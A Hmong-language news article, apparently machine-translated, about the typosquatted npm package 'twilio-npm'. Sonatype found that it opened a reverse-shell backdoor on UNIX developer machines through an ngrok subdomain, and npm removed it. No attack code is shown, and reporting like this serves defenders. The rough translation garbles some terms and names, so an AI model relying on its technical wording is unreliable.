Lub npm pob uas ua tau zoo li "twilio-npm" thiab tau tsim txoj hauv kev rau sab nraum zoov

Lub tsev khaws ntaub ntawv JavaScript, uas yog npaj los ua lub tsev qiv ntawv cuam tshuam txog Twilio tso cai rau sab nraum zoov yuav muab ntsia tau rau hauv tus programmers 'computers Txhawm rau tso cai tawm tsam cov neeg nkag mus rau lub chaw haujlwm kis mob, nws tau muab tso rau lub npm qhib qhov chaw tso npe dhau hnub Friday.

Zoo hmoo, lub malware nrhiav kom tau kev pab Sonatype Tshaj Tawm Kev Ncaj Ncees pom sai sai cov malware, hauv peb hom ntawv, thiab tshem nws tawm rau hnub Monday.

Npm kev ruaj ntseg pab pawg tau tshem lub JavaScript chav qiv ntawv hnub Monday muaj npe "twilio-npm" los ntawm npm lub vev xaib vim nws muaj cov kab lus tsis zoo uas tuaj yeem qhib sab nraum zoov ntawm cov programmer 'computers.

Cov pob khoom uas muaj cov kab lus tsis zoo tau dhau los ua cov ncauj lus rov muaj dua nyob rau hauv qhib qhov qhib JavaScript code npe.

Lub tsev qiv ntawv JavaScript (thiab nws tus cwj pwm phem) tau nrhiav pom lub asthiv no los ntawm Sonatype, uas saib xyuas cov chaw khaws khoom siv pej xeem ua ib feem ntawm nws cov kev pabcuam kev nyab xeeb rau DevSecOps.

Hauv tsab ntawv tshaj tawm hnub Monday, Sonatype hais tias lub tsev qiv ntawv tau luam tawm thawj zaug hauv npm lub vev xaib rau hnub Friday, nrhiav tau tib hnub, thiab tshem tawm hnub Monday tom qab npm kev ruaj ntseg pab pawg muab lub pob ntim rau hauv blacklist.

Muaj ntau ntau yam pob khoom raug cai hauv npm cov ntawv sau npe ntsig txog lossis sawv cev rau kev pabcuam ntawm Twilio.

Tab sis raws li Ax Sharma, Sonatype tus ruaj ntseg engineer, twilio-npm tsis muaj dab tsi ua nrog lub tuam txhab Twilio. Twilio tsis koom nrog thiab tsis muaj ib yam dab tsi los ua nrog qhov tau sim ua tub sab nyiag khoom. Twilio yog thawj coj huab-sib txuas lus platform ua qhov kev pabcuam uas tso cai rau cov neeg tsim khoom los tsim VoIP-based kev siv uas tuaj yeem ua tau thiab tau txais kev hu xov tooj thiab ntawv nyeem.

Cov pob ntawm Twilio npm downloads yuav luag ib nrab ntawm ib lab lub sijhawm hauv ib lub lis piam, raws li cov kws ua choj. Nws lub koob meej nrov piav qhia txog vim li cas kev hem thawj cov neeg yuav txaus siab los ntes cov neeg tsim khoom siv nrog cov khoom cuav ntawm tib lub npe.

“Txawm li cas los xij, Lub Twilio-npm pob tsis tau tuav kom ntev txaus kom dag tau coob tus neeg. Kev thau tshaj tawm rau hnub Friday, Kaum Hlis 30, Sontatype Kev Tshaj Tawm Txoj Haujlwm Tshaj Tawm Kev Tshaj Tawm tau pom tias tus cim tau ua txhaum cai ib hnub tom qab - kev txawj ntse thiab tshuab kawm pom meej tau siv. Hnub Monday, Kaum Ib Hlis 2, lub tuam txhab luam tawm nws tshawb pom thiab cov cai raug rho tawm.

Txawm hais tias lub sijhawm luv luv ntawm npm portal, lub tsev qiv ntawv tau rub tawm ntau dua 370 zaug thiab tau muab tso rau hauv cov haujlwm tshwj xeeb JavaScript tsim thiab tswj los ntawm npm cov kab hais kom ua kab (Node Pob Tus Thawj Tswj), raws li Sharma. Cov. Thiab ntau ntawm cov pib thov muaj feem ntau yuav los ntawm scan xyaw thiab cov neeg uas muaj lub hom phiaj los taug qab cov kev hloov pauv mus rau npm cov ntawv sau npe.

Pob ntawv cuav yog ib daim ntawv teev cov malware thiab muaj 3 hom khoom muaj mus rub (1.0.0, 1.0.1 thiab 1.0.2). Tag nrho peb hom ntawv zoo nkaus li tau tshaj tawm hauv tib hnub, Kaum Hlis 30. Version 1.0.0 tsis ua tiav ntau, raws li Sharma. Nws tsuas yog muaj cov ntawv ua pov thawj me me, pob.json, uas rho tawm ib qho kev pab nyob hauv ib qho ngrok subdomain.

ngrok yog cov kev pabcuam raug cai uas cov neeg tsim khoom siv thaum kuaj lawv daim ntawv thov, tshwj xeeb yog qhib kev sib txuas rau lawv cov "localhost" server daim ntawv thov tom qab NAT lossis firewall. Txawm li cas los xij, raws li cov khoos phis tawm ntawm 1.0.1 thiab 1.0.2, tib qhov tshwm sim muaj nws cov ntawv sau tom qab hloov kho kom ua lub luag haujlwm tsis zoo, raws li Sharma.

Qhov no zoo qhib qhov chaw sab nraum zoov ntawm tus neeg siv lub tshuab, muab qhov chaw nres tsheb tswj hwm ntawm lub tshuab kev pom zoo thiab cov chaw taws teeb ua kom tiav (RCE) muaj peev xwm. Sharma tau hais tias lub plhaub thim rov qab tsuas yog ua haujlwm rau UNIX-based cov haujlwm ua haujlwm.

Cov neeg tsim kho yuav tsum hloov tus lej ID, cov lus tsis pub lwm tus neeg, thiab cov yuam sij

Cov kev tawm tswv yim npm hais tias cov tsim tawm uas yuav tau teeb tsa lub pob phom sij ua ntej nws raug tshem tawm yog qhov muaj kev pheej hmoo.

"Txhua lub koos pis tawj uas lub pob no tau teeb tsa lossis ua haujlwm yuav tsum raug txiav txim siab tag nrho," ntawm npm kev ruaj ntseg pab pawg tau hais hnub Monday, lees tias Sonatype qhov kev tshawb nrhiav.


Cov ntsiab lus ntawm tsab xov xwm ua raws li peb cov ntsiab cai ntawm kev tswj hwm kev ncaj nceesCov. Tshaj tawm ib qho yuam kev nyem no.

Yog thawj tus tuaj tawm tswv yim

Tso koj saib

Koj email chaw nyob yuav tsis tsum luam tawm.

*

*

  1. Lub luag haujlwm rau cov ntaub ntawv: Miguel Ángel Gatón
  2. Lub hom phiaj ntawm cov ntaub ntawv: Tswj SPAM, kev tswj xyuas tawm tswv yim.
  3. Sau raws cai: Koj kev tso cai
  4. Kev sib txuas lus ntawm cov ntaub ntawv: Cov ntaub ntawv yuav tsis raug xa mus rau lwm tus neeg thib peb tsuas yog los ntawm kev txiav txim siab raug cai.
  5. Cov ntaub ntawv khaws cia: Cov Ntaub Ntawv khaws tseg los ntawm Occentus Networks (EU)
  6. Txoj Cai: Txhua lub sijhawm koj tuaj yeem txwv, rov qab thiab tshem tawm koj cov ntaub ntawv.

bool (muaj tseeb)